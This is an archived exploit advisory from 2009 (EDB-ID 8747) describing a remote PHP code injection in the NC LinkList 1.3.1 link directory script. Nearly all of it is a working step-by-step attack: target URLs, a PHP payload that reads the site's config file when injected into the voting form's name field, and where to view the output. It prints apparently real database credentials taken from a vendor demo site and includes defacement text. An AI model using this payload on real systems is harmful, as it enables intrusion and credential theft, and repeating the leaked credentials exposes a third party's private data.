NC LinkList 1.3.1 - Remote Command Injection

EDB-ID:

8747

CVE:



Platform:

PHP

Published:

2009-05-20

--------------------------------------------------------------
NC LinkList 1.3.1 Remote Command injection Exploit
---------------------------------------------------------------
Founder :ThE g0bL!N
Vendor:http://www.php-linkverzeichnis.de
Thank You Very Much His0k4
Note: You Can choose Any Function in Php :)
---------------------------------------------------------------
Exploit:
--------
    1) Go To Url:
    ---------
              http://wwww.victim.co.il/[path]/index.php?action=vote&link=$number of links
     
 2) Write In:
     --------
             Ihr Name:  <? readfile("./inc/config.inc.php"); ?>.
    Ihre E-Mail: x0q@hotmail.fr
    Ihre Bewertung:10 sehr  Gut  # bel Hendia allah yahfad wa youstour
             Kommentar: Hacked By ThE g0bL!N
              
  3) Post The Topic:
        --------------
 
  4) Then Go to:
     -----------
  http://www.victim.co.il/[path]/index.php?action=show&view=votings&link=$number of links .
  
  5) View Source:
     -----------
  
Exapmle:
--------
  1)http://wwww.victim.co.il/[path]/index.php?action=vote&link=20000
  2)http://www.victim.co.il/[path]/index.php?action=show&view=votings&link=20000
  
Result:
--------
  $db_host = "localhost";            // MySQL - Hostname
$db_user = "d009b9e8";            // MySQL - Username
$db_pwd  = "iwkpwd99";            // MySQL - Passwort
$db_name = "d009b9e8";           // MySQL - database
Demo:
----
http://www.php-linkverzeichnis.de/demo/index.php?action=vote&link=800
----------------------------------------------------------------
Greetz : His0k4 Dos-Dz TeaM Snakes TeaM And All My Freinds (dz)
-----------------------------------------------------------------

# milw0rm.com [2009-05-20]